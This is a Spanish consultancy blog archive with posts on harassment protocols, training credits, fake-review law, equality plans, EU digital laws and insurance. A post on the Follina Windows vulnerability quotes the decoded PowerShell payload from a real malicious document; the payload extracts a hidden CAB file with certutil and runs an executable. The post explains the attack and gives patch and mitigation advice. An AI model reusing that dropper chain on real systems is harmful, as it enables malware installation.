ASESORA Y ASESOR CONFIDENCIAL

ASESORA Y ASESOR CONFIDENCIAL

Las empresas están obligadas a promover las condiciones de trabajo que eviten el acoso sexual y el acoso por razón de sexo, así como a arbitrar procedimientos específicos para su prevención y para dar cauce a las denuncias o reclamaciones que puedan formular quienes hayan sido objeto del mismo, de conformidad con lo establecido en el artículo 48 de la Ley Orgánica 3/2007, de 22 de marzo, para la igualdad efectiva de mujeres y hombres. 

La figura de la asesoría confidencial va implícita en todo protocolo de acoso. En este sentido, se designará a una o varias personas como asesoras o asesores confidenciales para dar cauce a las denuncias y reclamaciones que realicen quienes sean objeto de este tipo de acoso dentro de la empresa, en definitiva, será la persona encargada de la gestión y seguimiento de las denuncias.

La gestión de las denuncias debe realizarse de forma ágil, cuanto más detallada sea la denuncia más rápido concluirá la fase de investigación.

Una vez recibe el asesor/a confidencial la denuncia o reclamación, inicia una primera comprobación de los datos contenidos en la denuncia, tras lo cual realiza una investigación en detalle de los hechos acontecidos para, finalmente constatar si se está o no ante un caso de acoso sexual o por razón de género.

Durante la fase de investigación el asesor o asesora confidencial podrán establecer las medidas cautelares que a su criterio estimen necesarias para evitar el contacto entre denunciante y supuesto acosador/a hasta que se resuelva la situación. Es importante que la fase de investigación se lleve a cabo con tacto y cautela para las dos partes implicadas: denunciante y denunciada/o. Asimismo, se garantiza durante todo el procedimiento de investigación la confidencialidad y se protege la identidad de las personas que participan en las investigaciones.

El resultado de la investigación del asesor confidencial se plasma en un informe que contendrá las conclusiones a las que ha llegado, así como detallará las diligencias y actuaciones que ha realizado para obtener las pruebas. Este informe se emitirá a la dirección de la entidad para que lleve a cabo las acciones preventivas o disciplinarias razonadas en el mismo.

Si en el informe se concluye que se ha producido un hecho de acoso sexual o por razón de sexo, la dirección de la empresa debe adoptar las medidas correctoras que estime, atendiendo a las recomendaciones realizadas por el asesor confidencial, o bien, aquellas medidas comprendidas en el Régimen disciplinario previsto en el Convenio Colectivo de aplicación.

Puede que el resultado de la investigación esclarezca que no se ha producido un hecho de acoso sexual o por razón de sexo y en este caso únicamente se archiva el expediente, cuestión distinta será que se trate de una denuncia falsa ya que en este caso también se aplicarán sanciones.

La asesora o asesor confidencial debe ser una persona con formación en la materia para afrontar estas situaciones y velar porque durante todo el proceso de cumplan con garantías como la confidencialidad, de ahí, que también tenga un papel importante en materia de prevención de situaciones de acoso sexual y por razón de sexo, y no sólo se encargue de la tramitación y gestión de las denuncias.

 

 

Publicado el 29 de Julio de 2022
Por Judith Lorenzo
Departamento Jurídico

¿Te interesa lo que has leído?

GRUPO DATA somos un grupo de empresas, expertos y profesionales en Cumplimiento Normativo, Formación y Seguros.

VULNERABILIDAD 0DAY DESCUBIERTA EN WINDOWS

VULNERABILIDAD 0DAY DESCUBIERTA EN WINDOWS (CVE-2022-30190 «FOLLINA»)

Nota 17/06/2022: Microsoft ya ha subido un parche para la vulnerabilidad CVE-2022-30190 “Follina” dentro de la actualización de Junio de Windows, Se recomienda actualizar los equipos cuanto antes.

En los últimos días de mayo de 2022, la comunidad de ciberseguridad ha hecho eco de una nueva vulnerabilidad que afecta al sistema operativo Windows y el paquete de ofimática Microsoft Office. Esta nueva vulnerabilidad CVE-2022-30190, bautizada como “Follina” es capaz de ejecutar código arbitrario en las últimas versiones de Windows y Office con solo un click o incluso con 0 clicks.

Todo empezó por un Tweet del grupo de investigación en Ciberseguridad nao_sec. Este grupo japonés estaba analizando un documento infectado que había sido subido en el portal VirusTotal (Un servicio gratuito que analiza archivos y URLs en busca de malware).

Como dice el tweet, dentro del documento .doc hay una referencia a un link externo a una URL que carga un archivo HTML y este es capaz de ejecutar código arbitrario en PowerShell.

El documento hace uso de una utilidad en Word que carga una plantilla en remoto y lo muestra en el documento. Esta utilidad lo que hace es cargar un archivo HTML que define la plantilla del documento alojado en un servidor remoto.

El actor hace una referencia a una URL donde tiene alojado un archivo HTML donde podemos destacar dos cosas:

  • Hay un bloque de comentarios donde hay un montón de “A”s, aún no se sabe a ciencia cierta por qué es necesario pero esta entrada del blog de Bill Demirkapi indica que hay un Buffer de un tamaño fijo en una función que procesa el HTML, por lo que si el archivo es menor que 4096 bytes, no es capaz de iniciar el payload. Estas “A”s funcionan como relleno para que el archivo pase ese límite.
  • Vemos que dentro del HTML, hay una referencia a una URI con un esquema que hace referencia al protocolo ms-msdt utilizado por el sistema operativo para ejecutar el solucionador de problemas de windows.

(Nota: en vez de poner http:// o https:// como en las URIs que todos conocemos, en esta URI contiene ms-msdt:/).

El esquema ms-msdt hace referencia al paquete PCWDiagnostics, más conocido como el “Solucionador de problemas” de Windows que se suele utilizar cuando no funciona el sonido o el WiFi..

Esa URI lanza el programa con una serie de parámetros. En uno de los parámetros vemos que usa sintaxis de PowerShell, donde se encuentra el payload codificado en Base64. Si lo decodificamos podemos ver lo que contiene:

$cmd = «c:\windows\system32\cmd.exe»;
Start-Process $cmd -windowstyle hidden -ArgumentList «/c taskkill /f /im msdt.exe»;
Start-Process $cmd -windowstyle hidden -ArgumentList «/c cd C:\users\public\&&for /r %temp%
%i in (05-2022-0438.rar) do copy %i 1.rar /y&&findstr TVNDRgAAAA 1.rar>1.t&&certutil –
decode 1.t 1.c &&expand 1.c -F:* .&&rgb.exe»
;

Estos comandos hacen lo siguiente:

  • Abre una ventana oculta de cmd.exe.
    • Mata al proceso msdt.exe.
    • Hace un bucle de los archivos que se encuentra dentro de un archivo .rar buscando una cadena en Base64 que codifica un archivo CAB.
      • Guarda el archivo CAB codificado en Base64 como 1.t.
      • Decodifica el archivo CAB codificado en Base64 y lo guarda como 1.c.
      • Descomprime el archivo CAB 1.c en el directorio.
      • Y por último ejecuta rgb.exe que seguramente se encontraría dentro del archivo CAB.

(Nota: un archivo CAB (.cab) se refiere a un archivo Windows Cabinet cuyo contenido tiene datos comprimidos, parecido a los ZIP. en este caso el archivo CAB tenía dentro un archivo ejecutable llamado rgb.exe).

En resumen, un documento aparentemente inofensivo sería capaz de ejecutar código arbitrario en el equipo de la víctima, aunque éste lo vea en vista protegida. Y para empeorar las cosas, si en vez de un archivo de word .doc se trata de un archivo de Formato de Texto Enriquecido .rtf simplemente con ver en archivo dentro del explorador de Windows es capaz de ejecutar código arbitrario sin ningún click.

En esta prueba de concepto publicada por Benjamin Delpy podemos ver cómo es explotada esta vulnerabilidad. Nada más abrir el archivo .doc con las últimas versiones de Windows y Microsoft Office, podemos ver cómo se abre la ventana del solucionador de problemas y cómo después aparece la calculadora de Windows que ha sido lanzada por el payload.

Aún sin parche publicado por la gente de Microsoft, la únicas formas de mitigar este ataque es deshabilitar el protocolo MSDT como indican en esta publicación de Microsoft..

 

 

Esta vulnerabilidad ya catalogada como 0day afecta a las últimas versiones de Office y de Windows, por lo que en estos días se esperan una oleada de ataques por correo electrónico y otros medios utilizando estas técnicas, por lo que hay que tomar aún más precauciones con los mensajes que recibimos.

Referencias:

 

 

 

Publicado el 24 de Junio de 2022
Por Alberto López
Departamento de Ciberseguridad

¿Te interesa lo que has leído?

GRUPO DATA somos un grupo de empresas, expertos y profesionales en Cumplimiento Normativo, Formación y Seguros.

¿UTILIZAN LAS EMPRESAS EL CRÉDITO FORMATIVO?

¿UTILIZAN LAS EMPRESAS EL CRÉDITO FORMATIVO?

 

La formación es un pilar fundamental para las empresas, ayuda a mejorar la competitividad, así como a incrementar la productividad y empleabilidad ofreciendo un valor añadido a la empresa.

La Formación Bonificada es un crédito concedido a las empresas para que proporcionen a sus empleados acciones formativas relacionas con el puesto de trabajo con el objetivo de aumentar la cualificación profesional e incrementar su el rendimiento en el puesto de trabajo, mejorando sus competencias profesionales.

La principal característica de la formación bonificada es que es totalmente gratuita para los trabajadores y además no supone coste para la empresa, ya que se puede bonificar hasta el 100% del importe de la formación en las cuotas de la Seguridad Social.

La mayoría de las entidades desconocen la posibilidad de aprovecharse de este recurso para formar a sus trabajadores.

Según los datos analizados por la Encuesta Anual Laboral sobre formación programada elaborada por el Ministerio de Trabajo, influyen otros factores por los que las empresas no forman a sus trabajadores como:

  • El nivel de formación de sus empleados es adecuado.
  • Los trabajadores no disponen de tiempo debido a la elevada carga de trabajo.
  • Las empresas contratan personal ya cualificado con las competencias necesarias a desarrollar en el puesto de trabajo.

También, influyen otros factores relacionados con el coste, la falta de cursos adecuados y las dificultades de acceso a ayudas o subvenciones.

Las empresas que forman a sus trabajadores mediante la formación bonificada demandan acciones formativas relacionadas con dirección, trabajo en equipo, atención al público o trato con clientes, administrativas de oficina.

Grupo Data como entidad acreditada por el por el Servicio Público de Empleo Estatal y Organizadora de la Fundación Estatal para el Empleo con nº de Expediente B220076AE, nos encargamos de toda la gestión para la realización de cursos de formación bonificada.

 

Publicado el 24 de Junio de 2022
Por Raquel Costa
Responsable de Formación Bonificada

¿Te interesa lo que has leído?

GRUPO DATA somos un grupo de empresas, expertos y profesionales en Cumplimiento Normativo, Formación y Seguros.

¿EL FIN DE LAS RESEÑAS FALSAS O FAKE REVIEWS?

¿EL FIN DE LAS RESEÑAS FALSAS O FAKE REVIEWS?

Uno de los puntos clave para un ecommerce son las reseñas o comentarios de los productos/servicios ofrecidos a través de la web. La contratación de lo vendido en una web puede verse directamente afectada por un comentario que un cliente haya hecho sobre el bien o producto contratado. Este medio no solo ha sido utilizado para que los usuarios cuenten sus experiencias reales si no que se ha empleado, por parte del titular web, para crear falsas reseñas de clientes satisfechos o incluso, la competencia los utiliza para atacar al titular web.

El 28 de mayo entró en vigor la modificación de la Ley General para Defensa de los Consumidores y la Ley de Competencia Desleal  estableciendo:

“Las prácticas comerciales en las que un empresario facilite el acceso a las reseñas de los consumidores y usuarios sobre bienes y servicios deberán contener información sobre el hecho de que el empresario garantice o no que dichas reseñas publicadas han sido efectuadas por consumidores y usuarios que han utilizado o adquirido realmente el bien o servicio.

Se aplicarán sanciones para aquellos titulares web que afirmen que las reseñas de un determinado bien o servicio son realizadas por consumidores y usuarios que no hayan utilizado o adquirido realmente el bien o servicio. Además, también se pretende sancionar a las entidades que encarguen incluir reseñas falsas, o comentarios que distorsionen las reseñas de consumidores o usuarios reales, con el fin de disminuir las contrataciones y promocionar sus bienes o servicios.

También se incluye un apartado para penalizar las prácticas engañosas, en las que se realicen reseñas sin que se hayan tomado las medidas razonables y proporcionadas, por parte del responsable de la web, para garantizar que dichas reseñas pertenecen a dichos consumidores o usuarios reales.

Para evitar este tipo de conducta desleal, el Ministerio de Consumo es el organismo legitimado para controlar que las entidades que dispongan de una web cumplan con lo establecido en la normativa y de sancionar a las entidades por la práctica de esta conducta.

La Organización de Consumidores y Usuarios (OCU) establece que «Las sanciones podrían llegar al millón de euros (muy graves); o de hasta ocho veces el beneficio que se haya obtenido de forma ilícita cuando la infracción se comete en nuestro país, y de hasta el 4% del volumen de facturación cuando se cometan infracciones en varios países de la Unión Europea”.

La OCU da seis consejos para poder detectar las reseñas falsas que se realicen en un sitio web.

  1. Comprobar que la reseña de un producto tenga comentarios decompra verificada. De no ser así, no se tiene la certeza de que quién está opinando ha adquirido o contratado el producto.
  2. Las opiniones incluyen, de forma excesiva, muchas fotos, incluso vídeos. No es razonable que un producto cuente con muchos usuarios tan satisfechos como para dedicarle tanto esfuerzo a promocionarlo.
  3. Las opiniones más positivas son las más antiguas. Al ordenar los comentarios por fecha se puede ver si las más benevolentes coinciden en unas determinadas fechas.
  4. El gráfico de valoraciones para ese producto o servicio tiene forma de C, es decir, hay muchísimas buenas valoraciones (5 estrellas), pero también bastantes muy malas (1 estrella).
  5. Quienes opinan sobre ese producto o servicio lo hacen mucho y siempre en positivo.
  6. Comentarios vagos e inconcretos, que no aportan detalles de la experiencia.

 

Publicado el 24 de Junio de 2022
Por Alfredo Barroso
Responsable de LSSICE y Comercio Electrónico

¿Te interesa lo que has leído?

GRUPO DATA somos un grupo de empresas, expertos y profesionales en Cumplimiento Normativo, Formación y Seguros.

BOTNET

BOTNET

¿Qué es una botnet?

Una botnet es un conjunto de dispositivos conectados a través de internet que han sido infectados por algún tipo de malware y reciben órdenes por parte de un tercer actor. Estos dispositivos se conocen generalmente como ‘bots’ o ‘zombies’ y son coordinados de forma remota por un ciberdelincuente o bot herder para realizar ataques a gran escala. Cualquier dispositivo que esté conectado a la red ya sea ordenadores, routers, dispositivos IoT pueden llegar a formar parte de esta red.

 

Arquitectura de una red botnet

Generalmente la estructura de una red botnet se puede lograr mediante tres aproximaciones.

Modelo Cliente-Servidor

Las tareas que realizan los dispositivos infectados son dirigidas desde un servidor central conocido como C&C (Command & Control) y se comunican mediante protocolos como IRC ( Internal Relay Chat).

Modelo Proxy

Con el fin de dificultar la tarea de encontrar el servido C&C, se establece una serie de máquinas intermediarias o proxies. Ahora los clientes en lugar de comunicarse directamente con el servidor C&C lo hacen a través de los proxies y estos con el servidor C&C.

Modelo P2P

Esta es una aproximación descentralizada en la que los dispositivos infectados actúan tanto como clientes como C&C. Los comandos se propagan de bot a bot y para mantener el control, el bot Herder solo necesita tener contacto con cualquier máquina infecta. Este modelo es la evolución de las anteriores haciendo más difícil tumbar la botnet.

 

¿Cómo se infectan los equipos?

Existen distintos métodos de infección, entre ellos:

  • Troyanos.
  • Vulnerabilidades de día cero.
  • Configuraciones inseguras.

 

¿Cuál es el objetivo de una botnet?

Como cualquier acto de ciberdelincuencia, su finalidad es la de obtener algún tipo de beneficio económico. Este se puede lograr a través de diferentes caminos, los más comunes son:

  • Ataques de denegación de servicio o DDoS: este ataque se basa en la saturación de algún tipo de servicio, como una página web, hasta el punto de que deje de funcionar. Para ello utilizan un número elevado de estos bots de manera que accedan de forma simultánea al servicio hasta el punto de que colapsen el servicio.
  • Envío de spam: envío masivo de correos fraudulentos con el fin de realizar estafas de tipo phising o distribuir malware.
  • Venta y alquiler de la botnet: otra opción como viene siendo cada vez más común entre los delincuentes es vender un servicio. Su intención es vender estas redes a terceros que carecen de conocimientos para crearlas pero que desean realizar este tipo de ataque contra alguna entidad.
  • Minado de criptomonedas:  el minado de criptomonedas es un proceso que requiere una gran cantidad de recursos hardware. Esto supone un coste elevado, pero existe una opción mucho menos costosa que es utilizar la red botnet. De esta forma los recursos utilizados para minar criptomonedas son los de la red zombie en lugar de los suyos, aumentando los beneficios de esta forma.

¿Forma mi empresa parte de una botnet?

A través de incibe podemos encontrar una herramienta para comprobar si algún dispositivo que este conectado a nuestra red forma parte de alguna botnet. Su funcionamiento se base en identificar si la dirección IP pública de la empresa forma parte de alguna red botnet. La herramienta se puede encontrar en el siguiente enlace: https://www.incibe.es/protege-tu-empresa/herramientas/servicio-antibotnet.

 

 

Publicado el 24 de Junio de 2022
Por Francisco Javier García
Departamento de Ciberseguridad

¿Te interesa lo que has leído?

GRUPO DATA somos un grupo de empresas, expertos y profesionales en Cumplimiento Normativo, Formación y Seguros.

¿PUEDE UN TRABAJADOR CON CONTRATO FORMACIÓN REALIZAR HORARIOS NOCTURNOS?

¿PUEDE UN TRABAJADOR CON CONTRATO FORMACIÓN REALIZAR HORARIOS NOCTURNOS?

Tras la entrada en vigor del Real Decreto Ley 32/2021, de medidas urgentes para la reforma laboral, la garantía de la estabilidad en el empleo y la transformación del mercado de trabajo, las características del Contrato de Formación en Alternancia, se han visto modificadas. Entre estas modificaciones se encuentra la jornada de trabajo en la que se puede realizar esta modalidad contractual.

 

En primer lugar, es conveniente que sepamos que se considera trabajo nocturno. En este sentido, el Artículo 36 del Estatuto de los Trabajadores, establece que el horario nocturno es el comprendido entre las 10 de la noche y las 6 de la mañana. Además, indica que, para considerarse que un trabajo realiza nocturnidad, deberá trabajar en periodo nocturno, una parte no inferior a 3 horas de su jornada diaria de trabajo o bien, trabajar en tal periodo una parte no inferior a un tercio de su jornada de trabajo anual.

Por otro lado, debemos tener en cuenta que, el citado RDL 32/2021 establece que “las personas contratadas con contrato de formación en alternancia no podrán realizar horas complementarias ni horas extraordinarias […]. Tampoco podrán realizar trabajos nocturnos ni trabajo a turnos. Excepcionalmente, podrán realizarse actividades laborales en los citados periodos cuando las actividades formativas para la adquisición de los aprendizajes previstos en el plan formativo no puedan desarrollarse en otros periodos, debido a la naturaleza de la actividad”.

Esta excepción puede considerarse en los supuestos de sectores como la hostelería, donde existe demanda de jornada en periodos de nocturnidad.

A modo de conclusión, podemos determinar que el trabajador con contrato de formación en alternancia, no podrá realizar trabajos nocturnos, pero, existe cierta flexibilidad siempre y cuando la naturaleza de la actividad laboral así lo requiera.

Por otra parte, y teniendo todo lo descrito anteriormente lo anterior, en el supuesto de no considerar que exista necesidad de horario nocturno derivada de la actividad laboral, tendremos que tener en cuenta el horario que queremos que el trabajador realice, a continuación, detallamos un ejemplo:

Con motivo del cambio y la incertidumbre existente ante la gestión de los Contratos de Formación en Alternancia, desde Grupo Data, ofrecemos nuestro asesoramiento para la tramitación y gestión del mismo.

Somos centro acreditado por el Servicio Público de Empleo Estatal (SEPE), con código (8000001582).

 

Publicado el 24 de Junio de 2022
Por Néftaly Blanco
Responsable de Contratos de Formación

¿Te interesa lo que has leído?

GRUPO DATA somos un grupo de empresas, expertos y profesionales en Cumplimiento Normativo, Formación y Seguros.

CONSTITUCIÓN DE LA COMISIÓN NEGOCIADORA

CONSTITUCIÓN DE LA COMISIÓN NEGOCIADORA

El proceso de negociación de un PLAN DE IGUALDAD comienza con la constitución de la Comisión Negociadora. Resulta fundamental la correcta constitución de éste «órgano» para la validez del Plan de igualdad y su posterior depósito en el REGCON

La composición de la Comisión Negociadora variará atendiendo a una serie de circunstancias que se dan en el seno de la empresa, en todo caso, deberá estar compuesta por representantes de la parte empresarial y representantes de la parte social en igual número por cada parte, de ahí, que en numerosas ocasiones nos refiramos a la Comisión Negociadora como «comisión paritaria». Asimismo, también se promoverá la composición equilibrada en cuanto a mujeres y hombres que integrarán la misma.

Los miembros de la comisión negociadora que representarán a la parte social serán miembros de la Representación Legal de los Trabajadores y trabajadoras (RLT), delegados y delegadas de personal, o en determinados supuestos, las secciones sindicales, esta composición será proporcional a su representatividad.  La entidad por su parte, elegirá a los miembros que representarán a la misma, en igual número que los miembros de la parte social. En este caso el número máximo de miembros por cada parte será de seis miembros, doce en total.

En el caso de que la entidad, no contara con las representaciones legales referidas, la parte social de la Comisión Negociadora estará compuesta por la representación de las personas trabajadoras integradas por los sindicatos más representativos y sindicatos más representativos del sector al que pertenece la empresa, y que al mismo tiempo dispongan de legitimación negociadora. Esta representación sindical se conformará en proporción a la representatividad en el sector y garantizando la participación de todos los sindicatos legitimados. Ahora bien, transcurrido el plazo de diez días desde que los sindicatos recibieron convocatoria fehaciente para la participación en la negociación del plan de igualdad, la comisión negociadora estará válidamente constituida por las organizaciones que respondieron en el plazo habilitado.

Se nos abre un tercer escenario en aquellas entidades que cuentan con varios centros de trabajo en los que unos tienen las representaciones legales referidas, y otros no. En este sentido no hay novedad respecto a los dos escenarios anteriores ya que la composición de la comisión paritaria sigue un modelo híbrido de los dos escenarios anteriores. En este caso, los miembros de la Comisión Negociadora que representarán a la entidad serán elegidos por la misma, en cambio, los miembros que representarán a la parte social estarán integrados en primer lugar, por los miembros de las representaciones legales de aquellos centros de trabajo que si contaban con representación legal, y, en segundo lugar, por la representación de las personas trabajadoras integradas por los sindicatos más representativos y más representativos del sector al que pertenece la entidad. En éste último caso, hay diferencia en cuanto al número de miembros que integrarán la comisión ya que pasa a ser un máximo de trece miembros por cada una de las partes, en lugar de seis.

En conclusión, no será válido ni susceptible de inscripción en el REGCON, el plan de igualdad aprobado de forma unilateral ni tampoco aquel que se haya negociado por una Comisión Negociadora constituida sin seguir las pautas establecidas en el RD 901/2020.

 

Publicado el 24 de Junio de 2022
Por Judith Lorenzo
Departamento Jurídico

¿Te interesa lo que has leído?

GRUPO DATA somos un grupo de empresas, expertos y profesionales en Cumplimiento Normativo, Formación y Seguros.

Alcanzar un entorno responsable y seguro en Europa y mercados justos y libres con la Ley de Servicios Digitales (DSA) y la Ley de Mercados Digitales

ALCANZAR UN ENTORNO RESPONSABLE Y SEGURO EN EUROPA Y MERCADOS JUSTOS Y LIBRES CON LA LEY DE SERVICIOS DIGITALES (DSA) Y LA LEY DE MERCADOS DIGITALES

El Parlamento y el Consejo Europeo han aprobado un acuerdo para tratar de forma eficaz la propagación de contenido ilícito o ilegal en el ámbito de internet y proteger los derechos y libertades fundamentales de las personas en el entorno digital. La publicación de la Ley de Servicios Digitales, junto con la normativa aprobada en diciembre de 2020 sobre Mercados Digitales, se pretende definir unos estándares comunes en el espacio digital para conseguir que sea un sitio más seguro y abierto para los usuarios.

En primer lugar, el objetivo la Ley de Mercados Digitales es establecer un entorno económico más equitativo y competitivo para los nuevos actores y las empresas europeas.  La aprobación de esta normativa es necesaria para estimular, desbloquear los mercados digitales, reforzar la libertad de elección de los consumidores y evitar que las pequeñas empresas se encuentren sometidas a los gigantes en su sector. Los beneficios que se pretende alcanzar son.

  • Las empresas usuarias que dependen de los guardianes de acceso para ofrecer sus servicios en el mercado único tendrán un entorno empresarial más justo.
  • Los innovadores y las empresas tecnológicas emergentes tendrán nuevas oportunidades de competir e innovar en el entorno de las plataformas online sin condiciones abusivas que limiten su desarrollo.
  • Los consumidores podrán elegir entre más y mejores servicios, tendrán más oportunidades de cambiar de proveedor si lo desean y disfrutarán de un acceso directo a los servicios, por los que pagarán precios más justos.
  • Los guardianes de acceso conservarán todas sus oportunidades de innovar y ofrecer nuevos servicios. La única diferencia es que no se les permitirá someter a prácticas desleales, para obtener ventajas indebidas, a las empresas y clientes usuarios que dependen de ellos.

En segundo lugar, el objetivo de la Ley de Servicios Digitales es definir unos estándares globales para que los ciudadanos puedan tener un mayor control sobre sus datos empleados en las plataformas en línea y grandes empresas tecnológicas. Por lo tanto, los usuarios dispondrán de más opciones para la gestión de sus datos y nuevas obligaciones para las plataformas en lo que respecta anuncios dirigidos, teniendo en cuenta las prohibiciones para dirigirse a menores y la restricción de la recopilación de datos para la elaboración de perfiles. Con la aprobación de esta normativa se limita el poder que disponen las grandes tecnológicas entre las que se encuentran Google, Amazon, Meta (anteriormente Facebook) y Apple.

Este marco normativo sobre Servicios Digitales supone.

Para los ciudadanos Para los proveedores de servicios digitales
· Mejor protección de los derechos fundamentales.

· Más opciones, precios más bajos.

· Menor exposición a contenidos ilícitos.

· Seguridad jurídica y armonización de las normas.

· Puesta en marcha y expansión más fáciles en Europa.

Para las empresas usuarias de servicios digitales Para la sociedad en general
· Más opciones, precios más bajos.

· Acceso a los mercados de la UE a través de las plataformas.

· Igualdad de condiciones frente a los proveedores de contenidos ilícitos

· Mayor control democrático y supervisión de las plataformas sistémicas.

· Atenuación de riesgos sistémicos tales como la manipulación o la desinformación.

En definitiva, la Ley de Servicios Digitales será directamente aplicable en toda la UE 15 meses después de su entrada en vigor o a partir del 1 de enero de 2024, si esta fecha es posterior.

 

Publicado el 27 de Mayo de 2022
Por Alfredo Barroso
Responsable de LSSICE y Comercio Electrónico

¿Te interesa lo que has leído?

GRUPO DATA somos un grupo de empresas, expertos y profesionales en Cumplimiento Normativo, Formación y Seguros.

SEGURO DE VIAJE: TODO LO QUE NECESITAS SABER SOBRE NUESTRAS COBERTURAS DE VIAJE

SEGURO DE VIAJE: TODO LO QUE NECESITAS SABER SOBRE NUESTRAS COBERTURAS DE VIAJE

La pandemia del coronavirus ha interrumpido los viajes de la mayoría de la población, sin embargo, los datos del sector aéreo nos indican que hemos regresado a los niveles prepandemia ofertando para estas vacaciones el mismo número de asientos que en el verano previo al confinamiento.

 

¿Por qué necesito un seguro de viaje?

Es mejor prevenir que curar, una torcedura de tobillo, o una subida de fiebre pueden arruinar tu viaje (¡¡ Y tu cartera!!).

El seguro de viaje te protegerá en todos los momentos de tu viaje gracias a su amplio abanico de coberturas.

Antes: Puedes incluir la cobertura de cancelación, no temas enfermar en los días previos a tu viaje, el seguro te reembolsara el dinero de las reservas ya realizadas. También te permitirá sacar el visado en países que te exigen un seguro obligatorio.

Durante:  Tu equipaje estará asegurado ante robo o perdida. Los gastos médicos estarán cubiertos hasta el capital que desees, recuerda, en países como USA una consulta puede costarte cientos de dólares. ¡Protege tu salud y tu cartera!

Después: La compañía asumirá los costes de un regreso anticipado en caso de enfermedad propia o de un familiar.

¡Incluso podrás asegurar cualquier daño/perjuicio que realices a un tercero durante todo el viaje a través de la cobertura de Responsabilidad Civil ¡

Piénsatelo dos veces antes de viajar sin tu póliza, hay mas peligros de los que pensamos y por un pequeño importe, inferior al 5% del total del viaje, podrás dormir tranquilo.

 

Publicado el 29 de Abril de 2022
Por Luis Fernando Gallego
Departamento de Seguros

¿Te interesa lo que has leído?

GRUPO DATA somos un grupo de empresas, expertos y profesionales en Cumplimiento Normativo, Formación y Seguros.

EBROKER Y GRUPO DATA COLABORAN EN UN WEBINAR SOBRE PROTECCIÓN DE DATOS PARA LA COMUNIDAD DE USUARIOS DE LA PLATAFORMA

El pasado día 10 de mayo, tuvimos la oportunidad de formar parte de una sesión formativa, de la mano de la tecnológica Ebroker, bajo la temática de protección de datos y seguridad de la información en el Sector del Corredor de Seguros. 

En este sentido, durante la misma, abordamos cuestiones fundamentales y obligaciones esenciales en materia de protección de datos, como son, la gestión y formalización de las relaciones con nuestros proveedores, mediante la firma del contrato de encargado del tratamiento, los compromisos de confidencialidad con usuarios, la implementación de un procedimiento de atención al ejercicio de derechos, gestión de las brechas de seguridad, cumplimiento del principio de Responsabilidad proactiva, etc.

El cumplimiento y adaptación a la normativa se trata de un proceso continuo en el tiempo y, que puede otorgarnos importantes beneficios en nuestra gestión empresarial.

Desde Ebroker nos mostraron el cumplimiento de las exigencias normativas en la plataforma, con las diferentes funcionalidades que nos otorga, entre otras, recabar el consentimiento, trazabilidad en los procesos, cumplimiento del deber de información, medidas técnicas-organizativas, etc.

En este Webinar, al que asistieron cerca de 300 profesionales, se contó con la participación de Nuria Alfaro, Responsable de Marketing y Comunicación y Eva García, Consultora y experta en Formación de la tecnológica, mientras que, por nuestra parte participaron, nuestro CEO Manuel Granado y la responsable del Departamento Jurídico, María González.

 

 

Publicado el 27 de Mayo de 2022
Por María González
Responsable del Departamento Jurídico

¿Te interesa lo que has leído?

GRUPO DATA somos un grupo de empresas, expertos y profesionales en Cumplimiento Normativo, Formación y Seguros.